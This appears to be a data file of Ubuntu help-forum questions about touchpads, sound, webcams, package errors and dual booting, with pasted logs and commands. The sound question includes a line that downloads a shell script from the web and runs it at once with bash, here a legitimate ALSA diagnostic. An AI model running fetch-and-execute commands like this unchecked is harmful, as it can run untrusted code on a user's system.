398568	psmouse serio1 : alps : unknown alps touchpad in a lenovo ideapad flex 15	i just bought a lenovo ideapad flex 15 and ripped windows out of it to put ubuntu 13.10 on . for other people with ideapad flex 's , if you have the issue where ubuntu loads with 0 brightness , try adding : echo 85 > /sys/class/backlight/acpi_video0/brightness before the 'exit 0 ' line of your /etc/rc.local file . the only other problem i 've noticed is that the touchpad drivers do not load and the touchpad reacts essentially as a simple mouse with left and right click , no scrolling and no multi-touch capabilities . the touchscreen seems to work fine , but i do n't know what to really expect from a touchscreen in ubuntu . here is my xinput : freedom @ flex15 : ~ $ xinput list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ egalax inc. egalaxtouch exc7910-1026-13.00.00 id=9 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 generic mouse id=12 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ lenovo easycamera id=10 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=11 [ slave keyboard ( 3 ) ] ↳ ideapad extra buttons id=13 [ slave keyboard ( 3 ) ] my dmesg info on my touchpad/touchscreen : freedom @ flex15 : ~ $ dmesg | grep -i touch [ 1.900295 ] usb 2-1 : product : egalaxtouch exc7910-1026-13.00.00 [ 18.021041 ] psmouse serio1 : alps : unknown alps touchpad : e7=73 03 0a , ec=88 b6 06 [ 18.212564 ] input : egalax inc. egalaxtouch exc7910-1026-13.00.00 as /devices/pci0000:00/0000:00:14.0/usb2/2-1/2-1:1.0/input/input5 [ 18.212704 ] hid-multitouch 0003:0eef : a111.0001 : input , hiddev0 , hidraw0 : usb hid v2.10 device [ egalax inc. egalaxtouch exc7910-1026-13.00.00 ] on usb-0000:00:14.0-1/input0 and if i try to use synaptiks for anything i get : freedom @ flex15 : ~ $ synclient -l could n't find synaptics properties . no synaptics driver loaded ? also if i install synaptiks from the ubuntu software centre , it installs okay but trying to launch synaptiks gives the error that no touchpad is detected . obviously lenovo does n't offer support unless you use windows 8 , but according to their website the touchpads are either made by synaptics , elantech or alps . after looking here : mouse/touchpad settings for samsung series 9 in ubuntu 13.04 i found a solution for elantech touchpads , which i tried but had no effect . it looks like , from dmesg , that i have an alps touchpad . also that the patch was already committed to an earlier kernel . i used these intructions : http : //ubuntuforums.org/showthread.php ? t=2111236 & p=12692065 # post12692065 with no errors , but i still get the same outputs from dmesg , synclient and xinput . so from what i can gather , the touchpad drivers are not loaded ? or there is a lack of support for this laptop with the current version of ubuntu . could anyone advise please ? thank you . also sudo modprobe psmouse returns absolutely nothing . the keyboard function to toggle the touchpad on and off works fine . update : i tried this guide for 13.04 : http : //linuxg.net/ubuntu-13-04-touchpad-option-does-not-exist-error-fix/ and it provided a bit of information in the terminal ( everything went fine up until dkms autoinstall ) : freedom @ flex15 : /var/lib/dkms/psmouse $ sudo dkms autoinstall kernel preparation unnecessary for this kernel . skipping ... building module : cleaning build area ... . make kernelrelease=3.11.0-15-generic -c /lib/modules/3.11.0-15-generic/build m=/var/lib/dkms/psmouse/alps-1.3/build/src psmouse.ko ... . cleaning build area ... . dkms : build completed . error ! this module/version combo is already installed for kernel : 3.11.0-15-generic ( x86_64 ) then running sudo rmmod psmouse & & modprobe psmouse disables the touchpad functionality completely and returns error : could not insert 'psmouse ' : operation not permitted running sudo modprobe psmouse & & rmmod psmouse returns basic touchpad functionality ( movement , left/right click , no scrolling or multitouch ) and outputs libkmod : error ../libkmod/libkmod-module.c:753 kmod_module_remove_module : could not remove 'psmouse ' : operation not permitted error : could not remove module psmouse : operation not permitted all in all nothing has changed except dmesg , but not really : freedom @ flex15 : /var/lib/dkms/psmouse $ dmesg | grep -i touch [ 1.422626 ] usb 2-1 : product : egalaxtouch exc7910-1026-13.00.00 [ 8.683181 ] psmouse serio1 : alps : unknown alps touchpad : e7=73 03 0a , ec=88 b6 06 [ 8.715623 ] input : egalax inc. egalaxtouch exc7910-1026-13.00.00 as /devices/pci0000:00/0000:00:14.0/usb2/2-1/2-1:1.0/input/input5 [ 8.715756 ] hid-multitouch 0003:0eef : a111.0001 : input , hiddev0 , hidraw0 : usb hid v2.10 device [ egalax inc. egalaxtouch exc7910-1026-13.00.00 ] on usb-0000:00:14.0-1/input0 [ 2653.427571 ] usb 2-1 : product : egalaxtouch exc7910-1026-13.00.00 [ 2653.429091 ] input : egalax inc. egalaxtouch exc7910-1026-13.00.00 as /devices/pci0000:00/0000:00:14.0/usb2/2-1/2-1:1.0/input/input15 [ 2653.429267 ] hid-multitouch 0003:0eef : a111.0002 : input , hiddev0 , hidraw0 : usb hid v2.10 device [ egalax inc. egalaxtouch exc7910-1026-13.00.00 ] on usb-0000:00:14.0-1/input0 and i 'm still searching for a solution . thank you very much for the help so far .
398569	ethernet networks turned off and need to know how to turn them back on	so i turned my laptop on one day and the internet was really slow , like ten minuets to load the google page . so i need to know how to turn both of these ethernet things back on . i have tried messing with the network settings but i cant find a way to turn them back on .
398571	ca n't get default webcam to change . `` skipping unavailable plug in '' in sudo command	for the past week i have been trying to get my logitech c920 to act as my default webcam . i have a question posted here from last week , and had someone walk me through some steps . but despite everything seeming to be in order , it 's just not working . i have guvcview and v4l installed . i have gstreamer and multimedia selector installed . in multimedia selector , i have c920 selected as my default webcam . i get there by running root sudo gstreamer-properties however , when i open g chat or guvc , it still opens up my laptop screen camera and i have to select `` new '' or `` restart '' to open up external cam . i get this message after running sudo gstreamer-properties ( gstreamer-properties:2885 ) : gtk-warning ** : unknown property : gtkdialog.has-separator ( gstreamer-properties:2885 ) : gtk-warning ** : unknown property : gtkdialog.has-separator gstreamer-properties-message : skipping unavailable plugin 'artsdsink' gstreamer-properties-message : skipping unavailable plugin 'esdsink' gstreamer-properties-message : skipping unavailable plugin 'sunaudiosink' gstreamer-properties-message : skipping unavailable plugin 'glimagesink' gstreamer-properties-message : skipping unavailable plugin 'v4lmjpegsrc' gstreamer-properties-message : skipping unavailable plugin 'qcamsrc' gstreamer-properties-message : skipping unavailable plugin 'v4lsrc' gstreamer-properties-message : skipping unavailable plugin 'esdmon' gstreamer-properties-message : skipping unavailable plugin 'sunaudiosrc' could these unavailable plug ins be the problem ? i 'm running windows 7 and ubuntu 12.04 lts on toshiba satellite l755 memory : 3.8 gib processor : intel® core™ i5-2410m cpu @ 2.30ghz × 4 graphics : intel® sandybridge mobile os-type 64bit disk : 40.2 gb
398572	running 'apt-get update ' results in the following error	w : failed to fetch http : //packages.medibuntu.org/dists/precise/free/binary-i386/packages/dists/precise/main/source/sources 404 not found w : failed to fetch http : //packages.medibuntu.org/dists/precise/free/binary-i386/packages/dists/precise/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
398576	mssing icons with booting error	i just installed ubuntu 12.04 few days ago and it works fine until now , when i get error with ubuntu part 6 is disable and some of my icon in unity is missing . any help please ?
398577	no sound msi b85m-g43 haswell	so far i haven’t been able to get sound to work . here are the diagnostics i’ve done and notes i’ve made : the motherboard is an msi b85m-g43 . any tips to lead me in the right direction would be appreciated . i believe i 've got a good load of information here . lspci 00:00.0 host bridge : intel corporation 4th gen core processor dram controller ( rev 06 ) 00:02.0 vga compatible controller : intel corporation device 041e ( rev 06 ) 00:03.0 audio device : intel corporation xeon e3-1200 v3/4th gen core processor hd audio controller ( rev 06 ) 00:14.0 usb controller : intel corporation 8 series/c220 series chipset family usb xhci ( rev 05 ) 00:16.0 communication controller : intel corporation 8 series/c220 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 8 series/c220 series chipset family usb ehci # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation 8 series/c220 series chipset high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 1 ( rev d5 ) 00:1c.4 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 5 ( rev d5 ) 00:1d.0 usb controller : intel corporation 8 series/c220 series chipset family usb ehci # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation b85 express lpc controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 8 series/c220 series chipset family 6-port sata controller 1 [ ahci mode ] ( rev 05 ) 00:1f.3 smbus : intel corporation 8 series/c220 series chipset family smbus controller ( rev 05 ) 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 0c ) i installed xfce4-mixer , and it sees hda intel mid and hda intel pch . i set it to pch after i saw that mid is most likely just the spdif jack . i found that by rightclick system tray ( just left of clock ) > panel settings > panel applets tab > double click volume control it gave me a dos style window sound config alsamixer . when the card says mid you only have spdif outputs , when the card is changed to pch you have surround , center , side , line , etc . the pch chip says realtek alc892 . the mid chip says intel haswell hdmi . note : lspci shows a realtek nic , but not audio . cat /proc/asound/cards 0 [ mid ] : hda-intel - hda intel mid hda intel mid at 0xf7d14000 irq 46 1 [ pch ] : hda-intel - hda intel pch hda intel pch at 0xf7d10000 irq 45 gnome mplayer will appear to `` play '' audio just fine , but no sound comes out . trying to play video gave an error and choked* the system . vlc gives an error for either and chokes* the system playing video . the error is audio output failed : the audio device `` default '' could not be used : no such file or directory . * choke means that the system performed agonizingly slow , and trying to kill the offending task was a painful exercise in patience . aplay -l **** list of playback hardware devices **** card 0 : mid [ hda intel mid ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : mid [ hda intel mid ] , device 7 : hdmi 1 [ hdmi 1 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : mid [ hda intel mid ] , device 8 : hdmi 2 [ hdmi 2 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : pch [ hda intel pch ] , device 0 : alc892 analog [ alc892 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : pch [ hda intel pch ] , device 1 : alc892 digital [ alc892 digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 arecord -l **** list of capture hardware devices **** card 1 : pch [ hda intel pch ] , device 0 : alc892 analog [ alc892 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : pch [ hda intel pch ] , device 2 : alc892 alt analog [ alc892 alt analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 snippet from dmesg ... [ 8.897758 ] [ drm ] initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 0 [ 8.897807 ] snd_hda_intel 0000:00:03.0 : enabling device ( 0000 - > 0002 ) [ 8.897921 ] snd_hda_intel 0000:00:1b.0 : enabling device ( 0000 - > 0002 ) [ 8.898023 ] snd_hda_intel 0000:00:1b.0 : irq 45 for msi/msi-x [ 8.911128 ] sku : nid=0x1d sku_cfg=0x4027f603 [ 8.911130 ] sku : port_connectivity=0x1 [ 8.911131 ] sku : enable_pcbeep=0x0 [ 8.911132 ] sku : check_sum=0x00000007 [ 8.911133 ] sku : customization=0x000000f6 [ 8.911133 ] sku : external_amp=0x0 [ 8.911134 ] sku : platform_type=0x0 [ 8.911134 ] sku : swap=0x1 [ 8.911135 ] sku : override=0x1 [ 8.911537 ] autoconfig : line_outs=4 ( 0x14/0x15/0x16/0x17/0x0 ) type : line [ 8.911539 ] speaker_outs=0 ( 0x0/0x0/0x0/0x0/0x0 ) [ 8.911541 ] hp_outs=1 ( 0x1b/0x0/0x0/0x0/0x0 ) [ 8.911542 ] mono : mono_out=0x0 [ 8.911543 ] dig-out=0x1e/0x0 [ 8.911544 ] inputs : [ 8.911546 ] front mic=0x19 [ 8.911548 ] rear mic=0x18 [ 8.911549 ] line=0x1a [ 8.911551 ] realtek : no valid ssid , checking pincfg 0x4027f603 for nid 0x1d [ 8.911552 ] realtek : enabling init asm_id=0xf603 codec_id=10ec0892 [ 8.923063 ] input : hda intel pch front headphone as /devices/pci0000:00/0000:00:1b.0/sound/card1/input5 [ 8.923744 ] input : hda intel pch line out side as /devices/pci0000:00/0000:00:1b.0/sound/card1/input6 [ 8.923980 ] hda driver get symbol successfully from i915 module [ 8.924017 ] snd_hda_intel 0000:00:03.0 : irq 46 for msi/msi-x [ 8.924249 ] input : hda intel pch line out clfe as /devices/pci0000:00/0000:00:1b.0/sound/card1/input7 [ 8.924402 ] input : hda intel pch line out surround as /devices/pci0000:00/0000:00:1b.0/sound/card1/input8 [ 8.924468 ] input : hda intel pch line out front as /devices/pci0000:00/0000:00:1b.0/sound/card1/input9 [ 8.924524 ] input : hda intel pch line as /devices/pci0000:00/0000:00:1b.0/sound/card1/input10 [ 8.924580 ] input : hda intel pch rear mic as /devices/pci0000:00/0000:00:1b.0/sound/card1/input11 [ 8.924649 ] input : hda intel pch front mic as /devices/pci0000:00/0000:00:1b.0/sound/card1/input12 [ 8.935434 ] hda_codec : invalid connect_list verb 5 [ 1 ] :0 [ 8.935491 ] hda_codec : invalid connect_list verb 6 [ 1 ] :0 [ 8.935554 ] hda_codec : invalid connect_list verb 7 [ 1 ] :0 [ 8.935855 ] input : hda intel mid hdmi/dp , pcm=8 as /devices/pci0000:00/0000:00:03.0/sound/card0/input13 [ 8.935924 ] input : hda intel mid hdmi/dp , pcm=7 as /devices/pci0000:00/0000:00:03.0/sound/card0/input14 [ 8.935977 ] input : hda intel mid hdmi/dp , pcm=3 as /devices/pci0000:00/0000:00:03.0/sound/card0/input15 [ 9.181090 ] init : failed to obtain startpar-bridge instance : unknown parameter : instance [ 9.819528 ] [ drm ] enabling rc6 states : rc6 on , rc6p off , rc6pp off ... [ 49407.631452 ] i915 0000:00:02.0 : setting latency timer to 64 [ 49407.631537 ] snd_hda_intel 0000:00:03.0 : irq 43 for msi/msi-x [ 49407.631575 ] xhci_hcd 0000:00:14.0 : setting latency timer to 64 [ 49407.631602 ] mei_me 0000:00:16.0 : irq 45 for msi/msi-x [ 49407.631700 ] ehci-pci 0000:00:1a.0 : setting latency timer to 64 [ 49407.631777 ] snd_hda_intel 0000:00:1b.0 : irq 46 for msi/msi-x [ 49407.632532 ] i8042 kbd 00:09 : system wakeup disabled by acpi [ 49407.632535 ] ehci-pci 0000:00:1d.0 : setting latency timer to 64 [ 49407.632552 ] ahci 0000:00:1f.2 : setting latency timer to 64 [ 49407.632576 ] r8169 0000:02:00.0 : system wakeup disabled by acpi [ 49407.827509 ] -- -- -- -- -- -- [ cut here ] -- -- -- -- -- -- [ 49407.827530 ] warning : cpu : 3 pid : 4999 at /build/buildd/linux-3.11.0/drivers/gpu/drm/i915/intel_ddi.c:383 intel_ddi_put_crtc_pll+0x272/0x280 [ i915 ] ( ) [ 49407.827551 ] modules linked in : zram ( c ) parport_pc ( f ) ppdev ( f ) bnep rfcomm bluetooth nfsd ( f ) auth_rpcgss ( f ) nfs_acl ( f ) nfs ( f ) lockd ( f ) sunrpc ( f ) fscache ( f ) nls_iso8859_1 ( f ) snd_hda_codec_hdmi snd_hda_codec_realtek x86_pkg_temp_thermal kvm_intel ( f ) kvm ( f ) crct10dif_pclmul ( f ) crc32_pclmul ( f ) ghash_clmulni_intel ( f ) aesni_intel ( f ) aes_x86_64 ( f ) lrw ( f ) gf128mul ( f ) glue_helper ( f ) ablk_helper ( f ) cryptd ( f ) mxm_wmi snd_hda_intel snd_hda_codec snd_hwdep ( f ) snd_pcm ( f ) snd_page_alloc ( f ) snd_seq_midi ( f ) snd_seq_midi_event ( f ) microcode ( f ) snd_rawmidi ( f ) snd_seq ( f ) snd_seq_device ( f ) snd_timer ( f ) i915 serio_raw ( f ) snd ( f ) drm_kms_helper mei_me lpc_ich drm mei i2c_algo_bit soundcore ( f ) coretemp lp ( f ) parport ( f ) mac_hid wmi video ( f ) intel_smartconnect hid_generic usbhid hid r8169 ahci ( f ) libahci ( f ) mii ( f ) [ 49407.827553 ] cpu : 3 pid : 4999 comm : kworker/u8:21 tainted : gf c 3.11.0-14-generic # 21-ubuntu [ 49407.827553 ] hardware name : msi ms-7823/b85m-g43 ( ms-7823 ) , bios v3.4 09/18/2013 … -- dmesg | grep codec [ 8.935434 ] hda_codec : invalid connect_list verb 5 [ 1 ] :0 [ 8.935491 ] hda_codec : invalid connect_list verb 6 [ 1 ] :0 [ 8.935554 ] hda_codec : invalid connect_list verb 7 [ 1 ] :0 [ 49407.827551 ] modules linked in : zram ( c ) parport_pc ( f ) ppdev ( f ) bnep rfcomm bluetooth nfsd ( f ) auth_rpcgss ( f ) nfs_acl ( f ) nfs ( f ) lockd ( f ) sunrpc ( f ) fscache ( f ) nls_iso8859_1 ( f ) snd_hda_codec_hdmi snd_hda_codec_realtek x86_pkg_temp_thermal kvm_intel ( f ) kvm ( f ) crct10dif_pclmul ( f ) crc32_pclmul ( f ) ghash_clmulni_intel ( f ) aesni_intel ( f ) aes_x86_64 ( f ) lrw ( f ) gf128mul ( f ) glue_helper ( f ) ablk_helper ( f ) cryptd ( f ) mxm_wmi snd_hda_intel snd_hda_codec snd_hwdep ( f ) snd_pcm ( f ) snd_page_alloc ( f ) snd_seq_midi ( f ) snd_seq_midi_event ( f ) microcode ( f ) snd_rawmidi ( f ) snd_seq ( f ) snd_seq_device ( f ) snd_timer ( f ) i915 serio_raw ( f ) snd ( f ) drm_kms_helper mei_me lpc_ich drm mei i2c_algo_bit soundcore ( f ) coretemp lp ( f ) parport ( f ) mac_hid wmi video ( f ) intel_smartconnect hid_generic usbhid hid r8169 ahci ( f ) libahci ( f ) mii ( f ) cat /etc/modprobe.d/alsa-base.conf # autoloader aliases install sound-slot-0 /sbin/modprobe snd-card-0 install sound-slot-1 /sbin/modprobe snd-card-1 install sound-slot-2 /sbin/modprobe snd-card-2 install sound-slot-3 /sbin/modprobe snd-card-3 install sound-slot-4 /sbin/modprobe snd-card-4 install sound-slot-5 /sbin/modprobe snd-card-5 install sound-slot-6 /sbin/modprobe snd-card-6 install sound-slot-7 /sbin/modprobe snd-card-7 # cause optional modules to be loaded above generic modules install snd /sbin/modprobe -- ignore-install snd $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-ioctl32 ; /sbin/modprobe -- quiet -- use-blacklist snd-seq ; } # # workaround at bug # 499695 ( reverted in ubuntu see lp # 319505 ) install snd-pcm /sbin/modprobe -- ignore-install snd-pcm $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-pcm-oss ; : ; } install snd-mixer /sbin/modprobe -- ignore-install snd-mixer $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-mixer-oss ; : ; } install snd-seq /sbin/modprobe -- ignore-install snd-seq $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq-midi ; /sbin/modprobe -- quiet -- use-blacklist snd-seq-oss ; : ; } # install snd-rawmidi /sbin/modprobe -- ignore-install snd-rawmidi $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq-midi ; : ; } # cause optional modules to be loaded above sound card driver modules install snd-emu10k1 /sbin/modprobe -- ignore-install snd-emu10k1 $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-emu10k1-synth ; } install snd-via82xx /sbin/modprobe -- ignore-install snd-via82xx $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq ; } # load saa7134-alsa instead of saa7134 ( which gets dragged in by it anyway ) install saa7134 /sbin/modprobe -- ignore-install saa7134 $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist saa7134-alsa ; : ; } # prevent abnormal drivers from grabbing index 0 options bt87x index=-2 options cx88_alsa index=-2 options saa7134-alsa index=-2 options snd-atiixp-modem index=-2 options snd-intel8x0m index=-2 options snd-via82xx-modem index=-2 options snd-usb-audio index=-2 options snd-usb-caiaq index=-2 options snd-usb-ua101 index=-2 options snd-usb-us122l index=-2 options snd-usb-usx2y index=-2 # ubuntu # 62691 , enable mpu for snd-cmipci options snd-cmipci mpu_port=0x330 fm_port=0x388 # keep snd-pcsp from being loaded as first soundcard options snd-pcsp index=-2 # keep snd-usb-audio from beeing loaded as first soundcard options snd-usb-audio index=-2 i decided to try pavucontrol , so i installed that . when i run it i get an error window with connection to pulseaudio failed… it also says it will retry in 5 seconds . cd ~/downloads wget http : //www.alsa-project.org/alsa-info.sh -o alsa-info.sh & & bash alsa-info.sh the output is at here .
398578	thunderbird does n't load new mails	i 'm in the middle of setting up a mails server at home . for which i 'm following this guide , i got the thing up and running but i have encountered the next problem . i can send mails using thunderbird ( the messages appear at the recepient on the mailserver in the /home/user/maildir/new directory but they do n't load into thunderbird if i press : `` get mail '' . any toughts ?
398581	is there a terminal command to verify if wifi is enabled ?	since my laptop doesnt have a wireless network led indicator , i want to know if there is a command to verify if it is on or off ( i 'm installing the wireless drivers , so i ca n't tell if it is set on or off by seeing the list of wireless conections next to the clock )
398582	upnp in ubuntu 12.04 lts	i use qbittorrent and a tenda r502 router . i enabled upnp in the router and also in qbittorrent but i still do n't have direct incoming connections ( there is a little yellow sign , which must be green ) . is ubuntu 12.04 lts accepting upnp or do i need to install something ? thanks epsi
398586	unable to install synaptic neither ubuntu software center nor terminal	i just installed ubuntu 13.04 but i 'm not able to install synaptic . i tried these steps : sudo apt-get update sudo apt-get upgrade sudo apt-get remove synaptic sudo apt-get install synaptic the error the following packages have unmet dependencies : synaptic : i386 : depends : libgtk-3-0 : i386 ( > = 3.0.0 ) but it is not going to be installed depends : libvte-2.90-9 : i386 ( > = 1:0.27.2 ) but it is not going to be installed depends : libxapian22 : i386 but it is not going to be installed recommends : gksu : i386 but it is not going to be installed or kdebase-bin : i386 but it is not installable or policykit-1 : i386 recommends : libgtk2-perl : i386 ( > = 1:1.130 ) but it is not going to be installed recommends : rarian-compat : i386 but it is not going to be installed e : unable to correct problems , you have held broken packages .
398587	ca n't login as administrator to ubuntu 13.10	a few days ago i turned on my pc and could n't login with my username tu ubuntu 13.10 . i do n't know the reason , but i tried all what i found in internet and did n't work . until now , i have been using the same version of ubuntu for 2 months without any trouble . but now , when i login i go back to the login screen . as a guest i could login perfectly .
398590	upgrade from 12.04 to 12.04.3	i have installed a new vm and the template that provider has is only for 12.04 . how can i update to 12.04.3 ( and be safe not to upgrade to 12.10 ) . i have tried sudo apt-get update but it says nothing to update . could you please help .
398591	openssh-server on ubuntu 12.04 server does not send termination signal on reboot	after of some software installation maybe postfix or asterisk 11.7 or freepbx i canât figure what was , my terminal ( putty ) does not get any disconnection signal from server when iâm doing reboot from terminal . how can i fix this ?
398597	hdmi not working in ubuntu with nvidia 555m ( tried many things ! )	i 'm having difficulties in getting video out of my hdmi . i 've searched a lot in forums , and after many tries and many destroyed xorg.conf files i 'm at the starting point with no clue what to do . i have an 555m linux kernel 3.8.0-34-generic ubuntu 12.04 lts cuda drivers installed nvidia-settings does not open , but it is installed , i 've installed nvtv but it does not start either . my screen works ok on windows . thank you for your help
398598	upgraded to 13.10 usb card reader not working	i just upgraded to 13.10 and my usb card reader is now not working $ lsusb shows nothing and and `` disk '' shows nothing , , , i ; ve have try plugging and unplugging an rebooting.. ca n't use any mtn commands cause it doesnât see anything.. everything worked fine before the upgrade , do n't understand what got change or why it was change , sometime i think it 's to piss people like me off ... i 'm working on a eee netbook so ubs is need , usb flash sticks work and mount fine ... i need this for sd and cf cards thank andrew
398600	ubunto install wo n't recognize window 7 and ca n't finish dual boot install	i am a newbie and i am having several problems trying to install ubuntu 13.10 to a usb hard drive and dual boot with windows 7 on an internal hard drive . i made a live cd on a 4gb flash drive to install ubuntu from ... i can run the live cd and i try to install ubuntu first thing i notice is that it says no os installed ... it never seems to recognize that i already have windows 7 installed on this computer . it then gives me options 1 of them is to format the hard drive i chose `` other options '' it seems to recognize at that point both the 500 gb hard drives and the different partitions on each . there are 4 particions on my windows drive and just one on my usb drive . i choose the usb drive and set up 3 partitions 175gb for the boot loader 25gb for swap file and select use as `` ext4 '' and 300 which i plan to keep as ntfs for windows storage . it does n't give me the option for ntfs so i choose fat32 and will reformat in windows . it goes through the installation steps and then just hangs on reboot.. i waited overnight and it never rebooted ... . so i forced shutdown and restarted my computer it booted straight into windows 7 . i read the posts and double checked i have 64bit win7 and 64bit ubuntu so that is not the issue as to why it wo n't recognize 7 ... can anyone please help.. when i get back into 7 and check all the partitions are created on external usb drive but i do n't thing grub is being installed on external drive ... why wo n't install recognize previous installation and why no dual boot
398605	empathy closing just after launching	i do n't know what went wrong during last time i was using empathy . but it now immediately closes after launching . when i run it through terminal i get this error : ( empathy:4641 ) : glib-gio-error ** : g_menu_item_set_detailed_action : detailed action name 'win.join-contact name ' has invalid format trace/breakpoint trap ( core dumped ) i killed the process and restarted it . but it does not work.thanks in advance for the help !
398607	bluetooth detection	i need some help . i have dell inspiron 3521 laptop , and ubuntu 12.04 operating system . it is working good but only there is a problem in bluetooth . when searching , does not detect any device . please , if someone can help . following are the output of some commands : $ sudo rfkill list 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no 2 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no $ hcitool dev devices : hci0 9c:2a:70 : cf : ef:9e
398609	ubuntu sdk installation problem in 12.04	not able to install ubuntu sdk . i am using ubuntu 12.04 , lenovo , 4gb ram . when i try to install from software center also i am getting error . dependency is not satisfiable : qtcreator-plugin-ubuntu ( =2.8.1.bzr56precis0 ) what can be done ? should i remove ubuntu and install from first .
398613	how to export 4k video with kdenlive	i want to export 4k video from kdenlive in a format suitable for use with youtube . i composed the project in kdenlive using a 4k profile like the following : at the point of rendering , i am unsure how to have kdenlive output 4k video . the rendering settings now are as follows : could you advise me on how to export the video in 4k ?
398616	my mouse motion has become reversed	i am running ubuntu 13.10 . somehow the motion of my mouse on screen has become reversed . in other words , if i move the mouse left , the pointer moves right on screen , if i move it `` up '' , the pointer moves down . i think this happened when i changed batteries w/ the computer running but i 'm not sure . this only happens w/ one mouse . if i use a different one it moves normally . i 'm assuming a setting somewhere has got screwed up , but i do n't know where to wade in and try to correct it . rebooting with or without the mouse connected does not help . this is a logitech mouse that is part of a wireless s510 keyboard/mouse set . the mouse has a ps2 connection to the motherboard .
398617	driver error , audio video and touchpad do not work	i have a new device dell 3537 with amd radeon graphics . i tried to install wine on my device , since i am not very good at using terminal , i probably messed up with things there so now the touchpad and the audio do n't work . also i can only get appearence of ubuntu2d and cant get ubuntu ( 3d ) , i.e , the windows do n't resize when dragged on to the side or top of the windows . the the touchpad however works with sudo modprobe -r psmouse & & sudo modprobe psmouse proto=imps but only for a session also the scroll functionality of touchpad do n't work with this as well , however the usb mouse works fine all the time . how do i restore my device back to the stage where it worked fine ?
398618	how to delete pre-installed libreoffice from kde ?	i installed libreoffice 4.2 ( yes , beta release , much better ) when i was on ubuntu , but then , i installed kde desktop and libreoffice came together with kde . so now i have 2 libreoffice installed , one is development version ( beta ) and another one is normal , which came with kde . how to uninstall that version which came together with kde ? additional info : click on me , its a link to picture . ( i am not allowed to post pictures yet ) sorry , i was using windows 7 that moment . but i usually use kubuntu . . . i opened terminal : sudo su apt-get remove libreoffice* . * apt-get install /home/myusername/downloads/libreofficefolder/debs/* after that i would like to figure out how to remove from kde search that old libre office . i think i need to remove cache somehow , but i did n't find in google how . searching using mause in categories seems that old libreoffice dissapeared and new appears , but using search i can'f find new one , only old one . ( old one is removed ! ) p.s . i edited this comment because of comment of this comment ; )
398624	is there a system tray utility for the epson stylus c88+ ?	my dad claims there used to be a tool in the system tray that graphically showed him his ink levels , but there is n't anything there now . does such a utility exist ?
398629	i ca n't create extended partition on gparted	i 'm try to install ubuntu alongside with window 7 professional 64 bit sp1.i want to install ubuntu on extended partition.i use gparted on ubuntu live cd ( i also try with gparted live cd ) to create extended partition , but it 's ca n't choose extened partition on create as : drop down.how can i create it . this site suggested me to install ubuntu on extended partition . http : //www.dedoimedo.com/computers/dual-boot-windows-7-ubuntu.html thanks for all answers : ) screenshot : http : //postimg.org/image/4jml7u3ff/
398632	gps automotive navigation device with maps updates on ubuntu ?	i am looking for a new gps navigation device and one of the selection criteria is to be able to update the maps on ubuntu . from what i could read : tomtom devices used to work `` unofficially '' thanks to jtomtom , but new devices are locked to prevent this option . garmin clearly states that their plugin works only on windows and mac . becker offers their update software only for windows . thus i would like to know if there is another gps device manufacturer who would make it simpler for ubuntu users to download maps updates ? alternatively , i would be happy to find a workaround for the above mentioned devices .
398633	problems with skype and software in general	i setup lubuntu on my hp mini only yesterday with kind help by a bunch of users here . however , i tried to install skype today , but there is no version for lubuntu . i tried to find out what to do , but since i 'm absolutely inexperienced with using codes , i could n't solve it with this : sudo add-apt-repository `` deb http : //archive.canonical.com/ $ ( lsb_release -sc ) partner '' sudo apt-get update sudo apt-get install skype -- can you help me ? ( and where do i find an introduction to codes at all ? i have no idea ! ) second , i 've seen this twice now : this is a major failure of your software management system . please check for broken packages with synaptic , check the file permissions and correctness of the file '/etc/apt/sources.list ' and reload the software information with : 'sudo apt-get update ' and 'sudo apt-get install -f ' . i also ca n't open the software center , the window flashes up quickly and then disappears again instantly . is it possible i made a mistake when i installed the os ? could it solve the problem to do it over again ? can i use the same usb drive again and delete the image files i used yesterday ? and : my keyboard is extremely sensitive now . the cursor jumps around like crazy when i type . is that normal ? sorry , lots of questions . thank you for your time .
